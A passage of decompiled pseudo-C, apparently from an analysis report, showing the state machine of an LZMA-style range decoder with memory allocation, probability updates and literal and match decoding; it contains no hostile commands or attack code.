							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
